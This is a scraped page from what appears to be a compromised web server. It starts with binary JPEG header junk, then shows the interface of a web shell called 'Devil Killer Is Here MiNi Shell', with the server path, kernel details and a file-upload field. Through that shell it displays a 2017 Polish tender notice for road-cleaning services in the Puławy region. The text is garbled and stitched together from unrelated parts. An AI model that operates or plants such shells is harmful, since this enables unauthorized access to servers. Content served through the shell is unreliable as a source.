JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170221/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170221/29414-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.lubelskie.zdw.lublin.pl' target='_blank'>http://www.bip.lubelskie.zdw.lublin.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 29414 - 2017
              z dnia 2017-02-21 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Puławy: Usługi utrzymania czystości w pasach drogowych dróg wojewódzkich administrowanych przez RDW Puławy <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zarząd Dróg Wojewódzkich w Lublinie - Rejon Dróg Wojewódzkich w Puławach, krajowy numer identyfikacyjny
              16771100000, ul.
              ul. Składowa 
              ,
              24100  
              Puławy, woj.
              lubelskie, państwo
              Polska, tel.
              081 8863163, 8864103, e-mail
              rdw.pulawy@zdw.lublin.pl, faks
              818 863 163.
              <br />
              Adres strony internetowej (URL): www.bip.lubelskie.zdw.lublin.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Samorządowa jednostka budżetowa</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bip.lubelskie.zdw.lublin.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.lubelskie.zdw.lublin.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  tak
                <br />
                adres
                <br />tylko wnioski: rdw.pulawy@zdw.lublin.pl</div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />tylko wnioski: faksem nr: 818864103, 818863163, osobiście lub za pomocą doręczyciela<br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />oferty w formie pisemnej, w zamkniętych kopertach<br />
                Adres:
                <br />Rejon Dróg Wojewódzkich w Puawach, ul. Skadowa 1a, 24-100 Puławy</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Usługi utrzymania czystości w pasach drogowych dróg wojewódzkich administrowanych przez RDW Puławy <br /><b>Numer referencyjny: </b>R6.ST.3721.3.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />5<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Zamówienie obejmuje: 
1) Zadanie nr 1: Oczyszczanie pasów drogowych dróg wojewódzkich na terenie miasta Puławy: 
a. nr 801 (ul.: Dęblińska, Piaskowa, Czartoryskich, Głęboka),
b. nr 824 (ul.: Zielona, Kazimierska, Włostowicka),
c. nr 874 (ul. Centralna, Piłsudskiego) 
2) Zadanie nr 2: Oczyszczanie pasów drogowych dróg wojewódzkich na terenie miasta Nałęczów: 
a. nr 826 (ul. Kolejowa),
b. nr 830 (ul.: Bochotnica, Charz A),
3) Zadanie nr 3: Oczyszczanie pasów drogowych dróg wojewódzkich na terenie: 
miasta Dęblin: 
a.nr 801 (ul.: Mickiewicza, Stężycka, Podchorążych),
b. nr 831 (ul. Wiślana),
m. Stężyca 
a. nr 801 (ul. Królewska, Dęblińska) 
4) Zadanie nr 4: Oczyszczanie pasów drogowych dróg wojewódzkich na terenie OD Puławy: 
a. nr 874 most przez rz. Wisłę i odc. Góra Puławska  Klikawa   
b. nr 738 w m. Góra Puławska (ul. Kozienicka), odc. Bronowice  Kowala  
c. nr 743 w m. Góra Puławska (ul. Janowiecka), 
d. nr 824 w m. Bochotnica (ul.: Puławska, Nałęczowska), m. Karczmiska 
e. nr 826 odc. Przybysławice  Strzelce, 
f. nr 830 w m. Bochotnica, Wierzchoniów, Wąwolnica  
5) Zadanie nr 5: Odbiór śmieci z 72 szt. śmietniczek ulicznych zlokalizowanych w ciągu dróg wojewódzkich na terenie miasta Puławy.
2. Zakres zamówienia :
1) Zadanie nr 1  miasto Puławy:
Oczyszczanie: 
1. Jezdnie (maks.)  14 232 mb; 28 464 m
2. Chodniki i ścieżki rowerowe (maks.)  22 592 mb; 50 476 m
3. Wyspy rozdzielające i azyle dla pieszych (maks.)  5 209 m
4. Tereny zielone  67 500 m
5. Pas drogowy (powierzchnia ogólna)  151 649 m
Rodzaj i krotność czyszczeń:
a) 1-krotne oczyszczenie nawierzchni jezdni wraz z opaskami przy krawężnikach, ścieżek rowerowych, chodników, wysp rozdzielających i azyli dla pieszych po zakończeniu sezonu zimowego 2016/2017
b) 6-krotne oczyszczenie nawierzchni jezdni wraz z opaskami w okresie marzec  listopad 2017, 
c) 4-krotne oczyszczenie nawierzchni ścieżek rowerowych i chodników w okresie marzec  listopad 2017,
d) 4-krotne oczyszczenie wysp rozdzielających i azyli dla pieszych w okresie marzec  listopad 2017,
e) 1-krotne wiosenne roboty porządkowe na terenach zielonych w okresie marzec / kwiecień 2017,
f) 12-krotne zbieranie śmieci i nieczystości z terenu pasów drogowych (w tym jesienne uprzątnięcie liści) w okresie marzec  grudzień 2017     
2) Zadanie nr 2  miasto Nałęczów:
Oczyszczanie: 
1. Jezdnie (maks.)  5 177 mb; 10 354 m
2. Chodniki (maks.)  6 758 mb; 10 497 m
3. Tereny zielone  20 800 m
4. Pas drogowy (powierzchnia ogólna)  41 651 m
Rodzaj i krotność czyszczeń:
a) 1-krotne oczyszczenie nawierzchni jezdni wraz z opaskami przy krawężnikach oraz chodników po zakończeniu sezonu zimowego 2016/2017
b) 6-krotne oczyszczenie nawierzchni jezdni wraz z opaskami w okresie marzec  listopad 2017, 
c) 4-krotne oczyszczenie nawierzchni chodników w okresie marzec  listopad 2017,
d) 1-krotne wiosenne roboty porządkowe na terenach zielonych w okresie marzec / kwiecień 2017,
e) 12-krotne zbieranie śmieci i nieczystości z terenu pasów drogowych (w tym jesienne uprzątnięcie liści) w okresie marzec  grudzień 2017     
3) Zadanie nr 3  
miasto Dęblin:
Oczyszczanie: 
1. Jezdnie (maks.)  4 345 mb; 8 690 m
2. Chodniki i ścieżki rowerowe (maks.)  6 281 mb; 14 717 m
3. Tereny zielone  49 600 m
4. Pas drogowy (powierzchnia ogólna)  73 007 m
Rodzaj i krotność czyszczeń:
a) 1-krotne oczyszczenie nawierzchni jezdni wraz z opaskami przy krawężnikach oraz chodników i ścieżek rowerowych po zakończeniu sezonu zimowego 2016/2017
b) 6-krotne oczyszczenie nawierzchni jezdni wraz z opaskami w okresie marzec  listopad 2017, 
c) 4-krotne oczyszczenie nawierzchni chodników i ścieżek rowerowych w okresie marzec  listopad 2017,
d) 1-krotne wiosenne roboty porządkowe na terenach zielonych w okresie marzec / kwiecień 2017,
e) 12-krotne zbieranie śmieci i nieczystości z terenu pasów drogowych (w tym jesienne uprzątnięcie liści) w okresie marzec  grudzień 2017     
m. Stężyca:
Oczyszczanie: 
1. Jezdnie (maks.)  3 065 mb; 3 065 m
Rodzaj i krotność czyszczeń:
a) 1-krotne oczyszczenie nawierzchni jezdni wraz z opaskami przy krawężnikach po zakończeniu sezonu zimowego 2016/2017,
b) 3-krotne oczyszczenie nawierzchni jezdni wraz z opaskami w okresie marzec  listopad 2017, 
4) Zadanie nr 4 OD Puławy: na odcinkach dróg wojewódzkich nr: 
- 824: od km 20+888 do km 22+453 (m. Bochotnica)
- 824: od km 34+438 do km 35+050 (m. Karczmiska)
- 826: od km 020 do km 1+100 i od km 3+155 do km 7+600 (odc. Przybysławice  Strzelce)
- 830: od km 39+362 do km 39+887 (m. Wierzchoniów) 
- 830: od km 41+778 do km 41+ 927 (m. Bochotnica)
- 830: od km 28+230 do km 29+670 (m. Wąwolnica) 
- 874 most przez rz. Wisłę w m. Puławy
- 874: odcinek Góra Puławska  Klikawa
- 738: od km 21+345 do km 21+560, str. L i P oraz od km 24+000 do km 25+050, str. L i od km 24+200 do km 25+050, str. P. (ul. Kozienicka) 
- 743: od km 0+000 do km 0+700, str. L i P (ul. Janowiecka) 
Oczyszczanie: 
1. Jezdnie (maks.)  18 292 mb; 18 292 m
2. Chodniki (maks.)  14 597 mb; 25 838 m
Rodzaj i krotność czyszczeń:
a) 1-krotne oczyszczenie nawierzchni jezdni wraz z opaskami przy krawężnikach oraz chodników po zakończeniu sezonu zimowego 2016/2017
5) Zadanie nr 5: Odbiór śmieci z maksymalnie 72 szt. śmietniczek ulicznych zlokalizowanych w ciągu dróg wojewódzkich na terenie miasta Puławy.
3. Szczegółowo przedmiot zamówienia określony został w przedmiarze (załącznik I) oraz w warunkach realizacji umowy i standardach jakościowych prac (załącznik J). 
4. Zamawiający zastrzega sobie prawo bez konieczności zmiany umowy, na co Wykonawca wyraża zgodę do zmiany zakresu zamówienia poprzez zmiany wielkości oczyszczanych powierzchni (zadania nr 1  4), ilości opróżnianych śmietniczek (zadanie nr 5) lub krotności wykonywanych usług.  
5. Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych we wzorze umowy (załącznik H) oraz załącznikami: przedmiar (załącznik  I) i warunki realizacji umowy i standardy jakościowe prac (załącznik J), w sposób gwarantujący należytą jakość. 
6. Wykonawca jest zobowiązany do zapewnienia bezpiecznych warunków ruchu drogowego kołowego i pieszego w rejonie prowadzonych usług objętych umową na podstawie dostarczonego przez Zamawiającego lub sporządzonego we własnym zakresie projektu czasowej organizacji ruchu i zatwierdzonego przez zarządzającego ruchem na drogach wojewódzkich, tj. Dyrektora ZDW w Lublinie. 
7. Obowiązkiem Wykonawcy jest wywóz oraz zagospodarowanie wytworzonego w trakcie wykonywanej usługi odpadu, zgodnie z ustawą o odpadach z dnia 14 grudnia 2012 r. (Dz. U. z 2013, poz. Nr 21 z późn. zamian.). Wszelkie koszty oraz odpowiedzialność związane z wywozem i zagospodarowaniem wytworzonego odpadu ponosi Wykonawca,
Wykonawca zobowiązany jest wraz z fakturą dostarczyć Zamawiającemu dokument potwierdzający prawidłowe zagospodarowanie wytworzonych odpadów.
8. Zamawiający, stosownie do art. 29 ust. 3a ustawy PZP wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących               w zakresie zadań nr: 1  4 czynności operatora zamiatarki, a w zakresie zadania nr 5 pracowników w liczbie odpowiadającej dwóm pełnym etatom przy wykonywaniu czynności opróżniania śmietniczek ulicznych i wywozu odpadów.     
9. Zgodnie z art. 36aa ust. 2 ustawy PZP Wykonawcy mogą składać oferty w odniesieniu do jednej lub wszystkich części zamówienia. 
10. Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
11. Zgodnie z art. 30 ust. 4 ustawy, Zamawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego jest obowiązany wykazać, że oferowane usługi spełniają wymagania określone przez Zamawiającego (art. 30 ust. 5 ustawy).
Za rozwiązania równoważne uznane będzie wykonanie przedmiotowej usługi przy użyciu technologii oraz sprzętu innego niż określony przez Zamawiającego pod warunkiem, że ich parametry będą nie gorsze niż określone przez Zamawiającego. W przypadku zaoferowania rozwiązań równoważnych.
Wykonawca zobowiązany jest w druku oferty przetargowej wskazać czy oferuje rozwiązania równoważne.    
12. Wykonawca jest zobowiązany do wskazania w ofercie tych części zamówienia, których wykonanie zamierza powierzyć podwykonawcom i podania przez Wykonawcę firm podwykonawców.
13. Powierzenie wykonania części zamówienia podwykonawcom nie zwalnia Wykonawcy            z odpowiedzialności za należyte wykonanie tego zamówienia.
14. Zamawiający nie przewiduje udzielania zamówień uzupełniających. 
15. Rozliczenie następować będzie na podstawie cen jednostkowych wskazanych w ofercie.
16. Wykonawca otrzyma wynagrodzenie za faktyczne ilości wykonanych usług. <br /><br /><b>II.5) Główny kod CPV: </b>90600000-3<br /><b> Dodatkowe kody CPV:</b>90610000-6,
                90513200-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              143402.91<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 10<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Posiadanie aktualnego zaświadczenia o wpisie do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych na terenie gminy Miasto Puławy (w zakresie zadania nr 5).<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Minimalne warunki dotyczące zdolności technicznej lub zawodowej:
1) Doświadczenie Wykonawcy:
Wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie co najmniej 1 usługi polegającej na mechanicznym (przy użyciu zamiatarek ulicznych) oczyszczaniu nawierzchni utwardzonych (jezdni, chodników, ścieżek rowerowych, itp.), zlokalizowanych w pasach drogowych dróg krajowych, wojewódzkich, powiatowych, gminnych / miejskich, osiedlowych, której wartość nie była mniejsza niż :
a. w przypadku zadania nr 1: 50 000,00 zł brutto
b. w przypadku zadania nr 2: 20 000,00 zł brutto
c. w przypadku zadania nr 3: 20 000,00 zł brutto
d. w przypadku zadania nr 4: 57 000,00 zł brutto
e. w przypadku zadania nr 5: 12 000,00 zł brutto
i udokumentowanie, że usługi te wykonane zostały należycie.
Wymagana wartość usługi dotyczy również przypadku składania oferty na dowolną liczbę zadań.
2) Dysponowanie odpowiednim potencjałem kadrowym:
a. Zad. nr 1: brygada minimum 5 osób, w tym  minimum 1 operator zamiatarki 
b. Zad. nr 2: brygada minimum 3 osoby, w tym  minimum 1 operator zamiatarki 
c. Zad. nr 3: brygada minimum 5 osób, w tym  minimum 1 operator zamiatarki 
d. Zad. nr 4: brygada minimum 5 osób, w tym  minimum 1 operator zamiatarki 
e. Zad. nr 5: brygada minimum 3 osoby, w tym  minimum 1 kierowca z prawem jazdy minimum kat. B, C lub T 
3) Dysponowanie odpowiednim potencjałem technicznym:
a. Zad. nr 1: zamiatarka samojezdna lub doczepna z funkcją spryskiwania 
 minimum 1 szt.
b. Zad. nr 2: zamiatarka samojezdna lub doczepna z funkcją spryskiwania 
 minimum 1 szt.
c. Zad. nr 3: zamiatarka samojezdna lub doczepna z funkcją spryskiwania 
 minimum 1 szt.
d. Zad. nr 4: zamiatarka samojezdna lub doczepna z funkcją spryskiwania 
 minimum 1 szt.
e. Zad. nr 5: samochód ciężarowy samowyładowczy do 3,5 t lub ciągnik rolniczy z przyczepą  minimum 1 szt.
UWAGA !
Wykonawca w składanej ofercie może przyporządkować jeden sprzęt oraz konkretną brygadę osób do maksymalnie dwóch zadań.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1.Zamawiający przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w pkt. 1.1) i 2) z wyłączeniem lit. b) oraz dokumenty, o których mowa w pkt. 1.2) z wyłączeniem lit. b) w odniesieniu do podmiotów, na których zdolnościach polega Wykonawca na zasadach określonych w art. 22 a ustawy PZP. 
1) W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej Zamawiający będzie żądał: 
a) Wykazu usług, o których mowa w pkt. IV.2.1) SIWZ wraz z załączeniem dowodów określających, że usługi te zostały wykonane należycie (przy czym dowodami,     o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny        o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty. 
